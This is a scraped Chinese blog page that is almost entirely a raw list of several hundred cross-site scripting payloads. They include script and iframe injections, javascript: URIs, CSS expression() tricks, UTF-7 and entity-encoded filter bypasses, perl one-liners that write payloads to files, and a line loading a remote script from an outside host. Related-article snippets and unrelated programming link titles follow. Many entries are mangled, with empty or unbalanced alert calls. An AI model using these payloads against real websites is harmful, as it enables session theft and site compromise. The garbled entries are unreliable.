</TITLE><SCRIPT>alert();</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert(1911);">
<BODY BACKGROUND="javascript:alert(1912)">
<IMG DYNSRC="javascript:alert(1913)">
<IMG LOWSRC="javascript:alert(1914)">
<STYLE>li {list-style-image: url("javascript:alert(1915)");}</STYLE><UL><LI>XSS</br>
<BODY ONLOAD=alert()>
<BGSOUND SRC="javascript:alert(1919);">
<BR SIZE="&{alert(1920)}">
<LINK REL="stylesheet" HREF="javascript:alert(1921);">
<STYLE>@im\port'\ja\vasc\ript:alert(1926)';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert(1927))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert())'>
<STYLE TYPE="text/javascript">alert();</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert(1930)");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert(1931)")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert(1932)")}</STYLE>
<XSS STYLE="xss:expression(alert(1933))">
¼script¾alert()¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1936);">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1938);">
<IFRAME SRC="javascript:alert(1939);"></IFRAME>
<IFRAME SRC=# onmouseover="alert(1940)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert(1941);"></FRAMESET>
<TABLE BACKGROUND="javascript:alert(1942)">
<TABLE><TD BACKGROUND="javascript:alert(1943)">
<DIV STYLE="background-image: url(javascript:alert(1944))">
<DIV STYLE="background-image: url(&#1;javascript:alert(1946))">
<DIV STYLE="width: expression(alert(1947));">
<BASE HREF="javascript:alert(1948);//">
<? echo('<SCR)';echo('IPT>alert(1953)</SCRIPT>'); ?>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(1956)</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert();+ADw-/SCRIPT+AD4-
<img src=``&NewLine; onerror=alert()&NewLine;
<script /**/>/**/alert()/**/</script /**/
<iframe/src="data:text/html,<svg &#198319831983;&#198319830;load=alert(1983)>">
<meta content="&NewLine; 1984 &NewLine;; JAVASCRIPT&colon; alert(1984)" http-equiv="refresh"/>
<form><iframe &#;&#;&#; src="javascript:alert(1992)"&#;&#;&#;;>
http://www.google<script .com>alert(1994)</script
<script ^__^>alert())</script ^__^
</style &#;><script &#; :-(>/**/alert()/**/</script &#; :-(
&#;</form><input type&#;"date" onfocus="alert(2000)">
<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert()&NewLine;>X</a>
<script ~~~>alert()</script ~~~>
<iframe// src=javaSCRIPT&colon;alert(2013)
<%<!--'%><script>alert(2030);</script -->
<script src="data:text/javascript,alert(2031)"></script>
<iframe/onreadystatechange=alert()
<svg/onload=alert()
<input type="text" value=`` <div/onmouseover='alert(2036)'>X</div>
<img src=`xx:xx`onerror=alert()>
<meta http-equiv="refresh" content="0;javascript&colon;alert(2040)"/>
<script>+-+--+-+alert()</script>
<body/onload=&lt;!--&gt;&#20510alert()>
<script itworksinallbrowsers>/*<script* */alert()</script
<img src ?itworksonchrome?\/onerror = alert()
<svg><script onlypossibleinopera:-)> alert()
<script x> alert() </script =
<div/onmouseover='alert(2058)'> style="x:">
<--`<img/src=` onerror=alert()> --!>
<div style="position:absolute;top:0;left:0;width:206100%;height:206100%" onmouseover="prompt(2061)" onclick="alert(2061)">x</button>
<form><button formaction=javascript&colon;alert()>CLICKME
<script>alert();</script>
<script>alert();</script>
<IMG SRC="javascript:alert(2073);">
<IMG SRC=javascript:alert()>
<IMG SRC=javascript:alert()>
<IMG SRC=javascript:alert()>
<IMG """><SCRIPT>alert(2077)</SCRIPT>">
<scr<script>ipt>alert();</scr</script>ipt>
<script>alert())</script>
<img src=foo.png onerror=alert() />
<style>@im\port'\ja\vasc\ript:alert(2081)';</style>
<? echo('<scr)'; echo('ipt>alert(2082)</script>'); ?>
<marquee><script>alert()</script></marquee>
<IMG SRC=\"jav ascript:alert(2084);\">
<IMG SRC=\"jav ascript:alert(2085);\">
<IMG SRC=\"jav ascript:alert(2086);\">
<IMG SRC=javascript:alert())>
"><script>alert(2088)</script>
</title><script>alert()</script>
</textarea><script>alert()</script>
<IMG LOWSRC=\"javascript:alert(2092)\">
<IMG DYNSRC=\"javascript:alert(2093)\">
<font style='color:expression(alert(2094))'>
<img src="javascript:alert(2095)">
<script language="JavaScript">alert()</script>
<body onunload="javascript:alert(2097);">
<body onLoad="alert(2098);"
[color=red' onmouseover="alert(2099)"]mouse over[/color]
"/></a></><img src=2100.gif onerror=alert(2100)>
window.alert();
alert());'))">
<iframe<?php echo chr()?> onload=alert()></iframe>
"><script alert(2105))</script>
'">><script>alert(2107)</script>
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert(2109);\">
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert(2110);\">
<script> = ; alert()</script>
<STYLE type="text/css">BODY{background:url("javascript:alert(2112)")}</STYLE>
<?='<SCRIPT>alert(2113)</SCRIPT>'?>
" onfocus=alert(2115) "> <"
<FRAMESET><FRAME SRC=\"javascript:alert(2116);\"></FRAMESET>
<STYLE>li {list-style-image: url(\"javascript:alert(2117)\");}</STYLE><UL><LI>XSS
perl -e 'print \"<SCR\0IPT>alert(2118)</SCR\0IPT>\";' > out
perl -e 'print \"<IMG SRC=java\0script:alert(2119)>\";' > out
<br size=\"&{alert(2120)}\">
<scrscriptipt>alert()</scrscriptipt>
</br style=a:expression(alert(>
</script><script>alert()</script>
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(2124)>
[color=red width=expression(alert())][color]
<BASE HREF="javascript:alert(2126);//">
"></iframe><script>alert(2128)</script>
<body onLoad="while(true) alert(2129);">
'"></title><script>alert(2130)</script>
</textarea>'"><script>alert(2131)</script>
'""><script language="JavaScript"> alert(2132);</script>
</script></script><<<<script><>>>><<<script>alert()</script>
<INPUT TYPE="IMAGE" SRC="javascript:alert(2135);">
'></select><script>alert(2136)</script>
a="get";b="URL";c="javascript:";d="alert(2140);";eval(a+b+c+d);
='><script>alert(2141)</script>
<body background=javascript:'"><script>alert(2143)</script>></body>
">/XaDoS/><script>alert(2144)</script><script src="http://www.site.com/XSS.js"></script>
">/KinG-InFeT.NeT/><script>alert(2145)</script>
!--" /><script>alert(2148);</script>
<script>alert()</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert(2150)</script>><marquee><h1>XSS by xss</h1></marquee>
'"></title><script>alert(2151)</script>><marquee><h1>XSS by xss</h1></marquee>
<img """><script>alert(2152)</script><marquee><h1>XSS by xss</h1></marquee>
<script>alert()</script><marquee><h1>XSS by xss</h1></marquee>
"><script>alert(2154)</script>"><script>alert("XSS by \nxss</h1></marquee>
'"></title><script>alert(2155)</script>><marquee><h1>XSS by xss</h1></marquee>
<iframe src="javascript:alert(2156);"></iframe><marquee><h1>XSS by xss</h1></marquee>
'><SCRIPT>alert(2157))</SCRIPT><img src="" alt='
"><SCRIPT>alert(2158))</SCRIPT><img src="" alt="
\'><SCRIPT>alert(2159))</SCRIPT><img src="" alt=\'
'); alert(2162); var x='
\\'); alert(2163);var x=\'
//--></SCRIPT><SCRIPT>alert(2164));
>"><ScRiPt%20%0a%0d>alert(2165)%3B</ScRiPt>
<SCRIPT> alert(); </SCRIPT>
<BODY ONLOAD=alert()>
<BODY BACKGROUND="javascript:alert(2172)">
<IMG SRC="javascript:alert(2173);">
<IMG DYNSRC="javascript:alert(2174)">
<IMG LOWSRC="javascript:alert(2175)">
<INPUT TYPE="IMAGE" SRC="javascript:alert(2177);">
<LINK REL="stylesheet" HREF="javascript:alert(2178);">
<TABLE BACKGROUND="javascript:alert(2179)">
<TD BACKGROUND="javascript:alert(2180)">
<DIV STYLE="background-image: url(javascript:alert(2181))">
<DIV STYLE="width: expression(alert(2182));">
&apos;;alert())//\&apos;;alert(2185))//&quot;;alert(2185))//\&quot;;alert(2185))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(2185))&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;alert()&lt;/SCRIPT&gt;
&lt;SCRIPT&gt;alert())&lt;/SCRIPT&gt;
&lt;BASE HREF=&quot;javascript:alert();//&quot;&gt;
&lt;BGSOUND SRC=&quot;javascript:alert();&quot;&gt;
&lt;BODY BACKGROUND=&quot;javascript:alert();&quot;&gt;
&lt;BODY ONLOAD=alert()&gt;
&lt;DIV STYLE=&quot;background-image: url(javascript:alert())&quot;&gt;
&lt;DIV STYLE=&quot;background-image: url(&amp;#;javascript:alert())&quot;&gt;
&lt;DIV STYLE=&quot;width: expression(alert());&quot;&gt;
&lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert();&quot;&gt;&lt;/FRAMESET&gt;
&lt;IFRAME SRC=&quot;javascript:alert();&quot;&gt;&lt;/IFRAME&gt;
&lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert();&quot;&gt;
&lt;IMG SRC=&quot;javascript:alert();&quot;&gt;
&lt;IMG SRC=javascript:alert()&gt;
&lt;IMG DYNSRC=&quot;javascript:alert();&quot;&gt;
&lt;IMG LOWSRC=&quot;javascript:alert();&quot;&gt;
&lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert()&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
%BCscript%BEalert()%BC/script%BE
&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;;url=javascript:alert();&quot;&gt;
&lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;; URL=http://;URL=javascript:alert(2214);&quot;&gt;
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert()&gt;&lt;/OBJECT&gt;
a=&quot;get&quot;;&amp;#;b=&quot;URL(&quot;&quot;;&amp;#;c=&quot;javascript:&quot;;&amp;#;d=&quot;alert();&quot;)&quot;;&#;eval(a+b+c+d);
&lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert();&lt;/STYLE&gt;
&lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert())&quot;&gt;
&lt;XSS STYLE=&quot;xss:expression(alert())&quot;&gt;
&lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert()&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
&lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert()&quot;)}&lt;/STYLE&gt;
&lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert();&quot;&gt;
&lt;TABLE BACKGROUND=&quot;javascript:alert()&quot;&gt;&lt;/TABLE&gt;
&lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert()&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;
&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert();&quot;&gt;]]&gt;
&lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert()&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
&lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert()&lt;/SCRIPT&gt;&quot;&gt;
&lt;BR SIZE=&quot;&amp;{alert()}&quot;&gt;
&lt;IMG SRC=JaVaScRiPt:alert()&gt;
&lt;IMG SRC=javascript:alert()&gt;
&lt;IMG SRC=`javascript:alert()`&gt;
&lt;IMG SRC=javascript:alert())&gt;
&lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert();+ADw-/SCRIPT+AD4-
\&quot;;alert();//
&lt;/TITLE&gt;&lt;SCRIPT&gt;alert();&lt;/SCRIPT&gt;
&lt;STYLE&gt;@im\port&apos;\ja\vasc\ript:alert()&apos;;&lt;/STYLE&gt;
&lt;IMG SRC=&quot;jav ascript:alert();&quot;&gt;
&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert();&quot;&gt;
&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert();&quot;&gt;
&lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert();&quot;&gt;
perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert()>&quot;;&apos;&gt; out
perl -e &apos;print &quot;&amp;&lt;SCR\0IPT&gt;alert()&lt;/SCR\0IPT&gt;&quot;;&apos; &gt; out
&lt;IMG SRC=&quot; &amp;#; javascript:alert();&quot;&gt;
&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert()&gt;
&lt;IMG SRC=&quot;javascript:alert()&quot;
&lt;&lt;SCRIPT&gt;alert();//&lt;&lt;/SCRIPT&gt;
&lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert()&lt;/SCRIPT&gt;&quot;&gt;
&quot;&gt;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert()&gt;
&lt;/script&gt;&lt;script&gt;alert()&lt;/script&gt;
&lt;/br style=a:expression(alert(&gt;
&lt;scrscriptipt&gt;alert()&lt;/scrscriptipt&gt;
&lt;br size=\&quot;&amp;{alert()}\&quot;&gt;
perl -e &#;print \&quot;&lt;IMG SRC=java\0script:alert()&gt;\&quot;;&#; &gt; out
perl -e &#;print \&quot;&lt;SCR\0IPT&gt;alert()&lt;/SCR\0IPT&gt;\&quot;;&#; &gt; out
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert())>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert())>
<~/XSS STYLE=xss:expression(alert())>
"><script>alert(2401)</script>
</XSS/*-*/STYLE=xss:e/**/xpression(alert())>
XSS/*-*/STYLE=xss:e/**/xpression(alert())>
XSS STYLE=xss:e/**/xpression(alert())>
</XSS STYLE=xss:expression(alert())>
';;alert(2406))//\';;alert(2406))//";;alert(2406))//\";;alert(2406))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert())<;/SCRIPT>;
<;SCRIPT>;alert()<;/SCRIPT>;
<;SCRIPT>;alert())<;/SCRIPT>;
<;BASE HREF=";javascript:alert(2411);//";>;
<;BGSOUND SRC=";javascript:alert(2412);";>;
<;BODY BACKGROUND=";javascript:alert(2413);";>;
<;BODY ONLOAD=alert()>;
<;DIV STYLE=";background-image: url(javascript:alert(2415))";>;
<;DIV STYLE=";background-image: url(&;#1;javascript:alert(2416))";>;
<;DIV STYLE=";width: expression(alert(2417));";>;
<;FRAMESET>;<;FRAME SRC=";javascript:alert(2418);";>;<;/FRAMESET>;
<;IFRAME SRC=";javascript:alert(2419);";>;<;/IFRAME>;
<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(2420);";>;
<;IMG SRC=";javascript:alert(2421);";>;
<;IMG SRC=javascript:alert()>;
<;IMG DYNSRC=";javascript:alert(2423);";>;
<;IMG LOWSRC=";javascript:alert(2424);";>;
<;STYLE>;li {list-style-image: url(";javascript:alert(2428)";);}<;/STYLE>;<;UL>;<;LI>;XSS
%BCscript%BEalert()%BC/script%BE
<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(2433);";>;
<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(2435);";>;
<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert()>;<;/OBJECT>;
a=";get";;&;#;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert();";)";;&#;eval(a+b+c+d);
<;STYLE TYPE=";text/javascript";>;alert();<;/STYLE>;
<;IMG STYLE=";xss:expr/*XSS*/ession(alert(2442))";>;
<;XSS STYLE=";xss:expression(alert(2443))";>;
<;STYLE>;.XSS{background-image:url(";javascript:alert(2444)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;
<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(2445)";)}<;/STYLE>;
<;LINK REL=";stylesheet"; HREF=";javascript:alert(2446);";>;
<;TABLE BACKGROUND=";javascript:alert(2451)";>;<;/TABLE>;
<;TABLE>;<;TD BACKGROUND=";javascript:alert(2452)";>;<;/TD>;<;/TABLE>;
<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(2454);";>;]]>;
<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(2455)";>;<;/B>;<;/I>;<;/XML>;
<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(2459)<;/SCRIPT>;";>;
<;BR SIZE=";&;{alert(2464)}";>;
<;IMG SRC=JaVaScRiPt:alert()>;
<;IMG SRC=javascript:alert()>;
<;IMG SRC=`javascript:alert()`>;
<;IMG SRC=javascript:alert())>;
<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert();+ADw-/SCRIPT+AD4-
\";;alert(2474);//
<;/TITLE>;<;SCRIPT>;alert();<;/SCRIPT>;
<;STYLE>;@im\port';\ja\vasc\ript:alert(2476)';;<;/STYLE>;
<;IMG SRC=";jav ascript:alert(2477);";>;
<;IMG SRC=";jav&;#x09;ascript:alert(2478);";>;
<;IMG SRC=";jav&;#x0A;ascript:alert(2479);";>;
<;IMG SRC=";jav&;#x0D;ascript:alert(2480);";>;
perl -e ';print ";<;IM SRC=java\0script:alert(2482)>";;';>; out
perl -e ';print ";&;<;SCR\0IPT>;alert(2483)<;/SCR\0IPT>;";;'; >; out
<;IMG SRC="; &;#14; javascript:alert(2484);";>;
<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert()>;
<;IMG SRC=";javascript:alert(2489)";
<;<;SCRIPT>;alert();//<;<;/SCRIPT>;
<;IMG ";";";>;<;SCRIPT>;alert(2492)<;/SCRIPT>;";>;
";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(2611)>;
<;/script>;<;script>;alert()<;/script>;
<;/br style=a:expression(alert(>;
<;scrscriptipt>;alert()<;/scrscriptipt>;
<;br size=\";&;{alert(2615)}\";>;
perl -e &#;print \";<;IMG SRC=java\0script:alert(2616)>;\";;' >; out
perl -e &#;print \";<;SCR\0IPT>;alert(2617)<;/SCR\0IPT>;\";;' >; out
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert())>
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert())>
<~/XSS STYLE=xss:expression(alert())>
"><script>alert(2622)</script>
</XSS/*-*/STYLE=xss:e/**/xpression(alert())>
XSS/*-*/STYLE=xss:e/**/xpression(alert())>
XSS STYLE=xss:e/**/xpression(alert())>
</XSS STYLE=xss:expression(alert())>
>"><script>alert(2627)</script>&
"><STYLE>@import"javascript:alert()";</STYLE>
>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(2629)>
>%%><img%20src%3d%22javascript:alert()%>
'%uff1cscript%uff1ealert(2631)%uff1c/script%uff1e'
<IMG SRC="javascript:alert(2633);">
<IMG SRC=javascript:alert()>
<IMG SRC=JaVaScRiPt:alert()>
<IMG SRC=JaVaScRiPt:alert()>
<IMG SRC="jav ascript:alert(2640);">
<IMG SRC="jav ascript:alert(2641);">
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert();<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
<script>alert()</script>
%3cscript%3ealert()%3c/script%3e
%%3e%3cscript%3ealert()%3c/script%3e
<IMG SRC="javascript:alert(2652);">
<IMG SRC=javascript:alert()>
<IMG SRC=javascript:alert()>
<img src=xss onerror=alert()>
<IMG """><SCRIPT>alert(2656)</SCRIPT>">
<IMG SRC=javascript:alert())>
<IMG SRC="jav ascript:alert(2658);">
<IMG SRC="jav ascript:alert(2659);">
<BODY BACKGROUND="javascript:alert(2663)">
<BODY ONLOAD=alert()>
<INPUT TYPE="IMAGE" SRC="javascript:alert(2665);">
<IMG SRC="javascript:alert(2666)"
<<SCRIPT>alert();//<</SCRIPT>
%253cscript%253ealert()%253c/script%253e
"><s"%2b"cript>alert(2670)</script>
foo<script>alert()</script>
<scr<script>ipt>alert()</scr</script>ipt>
';alert(2674))//\';alert(2674))//";alert(2674))//\";alert(2674))//--></SCRIPT>">'><SCRIPT>alert())</SCRIPT>
<marquee onstart='javascript:alert(2675);'>=(◕_◕)=
</span></span><svg onload="alert(2676)//“ #"="">

 

1.8 收集的XSS Payload的更多相关文章

  1. XSS Payload知识备忘

    参考资料:<白帽子讲Web安全>吴翰清 著 参见: 百度百科 http://baike.baidu.com/view/50325.htm 维基百科 http://zh.wikipedia. ...

  2. XSS payload 大全

    收集的一些XSS payload,主要分为五大类,便于查阅. #第一类:Javascript URL <a href="javascript:alert('test')"&g ...

  3. 【命令汇总】XSS payload 速查表

    日期:2019-05-15 14:06:21 作者:Bay0net 介绍:收集并且可用的一些 XSS payload,网上的速查表很多,但是测试了下很多 payload 的不可用,这里都是自己能用的 ...

  4. ES6中的模板字符串和新XSS Payload

    ES6中的模板字符串和新XSS Payload 众所周知,在XSS的实战对抗中,由于防守方经常会采用各种各样严格的过滤手段来过滤输入,所以我们使用的XSS Payload也会根据实际情况作出各种各样的 ...

  5. xss payload

    xss payload可以使用富客户端文本书写,大多数用javascript,少部分用actionscript等等. 1.盗取cookie,发起cookie劫持 使用xss漏洞插入cookie.js ...

  6. Web安全系列(二):XSS 攻击进阶(初探 XSS Payload)

    什么是 XSS Payload 上一章我谈到了 XSS 攻击的几种分类以及形成的攻击的原理,并举了一些浅显的例子,接下来,我就阐述什么叫做 XSS Payload 以及从攻击者的角度来初探 XSS 攻 ...

  7. XSS Payload深入分析整理

    几种加载XSS Payload的不常见标签 众所周知,一种调用JavaScript的方法就是在元素类型上使用事件处理器(Event Handler),通常的一种方法类似: <img src=x ...

  8. xssless - 自动化的XSS payload攻击器

    XSSLESS 一个用Python编写的自动化XSS 负载(payload)攻击器 用法: 记录请求 并结合Burp proxy 选择你想生成的请求,然后右键选择“保存项目” 使用xssless生成你 ...

  9. xss payload大全

    刚好刚才在fuzz一个站的时候用到,就从笔记里抛出来了. code: (1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js> ...

随机推荐

  1. 练习题目 :if for while else range、xrange、zip

    range在内存中直接生成指定的序列,当序列非常大时会浪费内存资源: xrange则不会直接生成一个list,而是每次调用返回其中的一个值,而非直接全部生成存于内存中 range([start,] s ...

  2. shell 定义变量

    注意定义变量的语法: var="ABC" 等号之间不能有空格,否则会报错

  3. XShell 连接虚拟机中的服务器 失败 、连接中断(Connection closed by foreign host.)

    在使用XShell连接虚拟机中的服务器时,报以下错误并断开连接,之前连接还是挺稳定的,忽然就这样了 Last login: Thu Aug :: from 192.168.1.102 [root@no ...

  4. Array对象(一)

    Array是JavaScript中的一个事先定义好的对象(也可以称作一个类),可以直接使用. 创建Array对象: var array = new Array(); 创建指定元素个数的Array对象: ...

  5. Linux配置redis服务器

    1.安装redis 2.开启6379端口,使外部机器能够访问 3.

  6. 分享知识-快乐自己:运行(wordcount)案例

    运行 wordcount 案例: 一):大数据(hadoop)初始化环境搭建 二):大数据(hadoop)环境搭建 三):运行wordcount案例 四):揭秘HDFS 五):揭秘MapReduce ...

  7. wp8使用现有sqlite数据库

    就是把现有文件转移到隔离空间即可 代码如下 private async void CopyDB()        {            StorageFile fage = await Appli ...

  8. Python基础之字符串操作

    字符串的常用操作包括但不限于以下操作: 字符串的替换.删除.截取.复制.连接.比较.查找.分割等 这里将对字符串的内置操作方法进行总结归纳,重点是以示例的方式进行展示. 使用type获取创建对象的类 ...

  9. 计算机丨浏览器访问出现DNS_PROBE_POSSIBLE解决方法

    方法1.打开命令控制台输入: netsh winsock reset.提示重启,电脑重启后就ok了. 其他方法待续......

  10. 【BZOJ 3238】差异 后缀自动机+树形DP

    题意 给定字符串,令$s_i$表示第$i$位开始的后缀,求$\sum_{1\le i < j \le n} len(s_i)+len(s_j)-2\times lcp(s_i,s_j)$ 先考虑 ...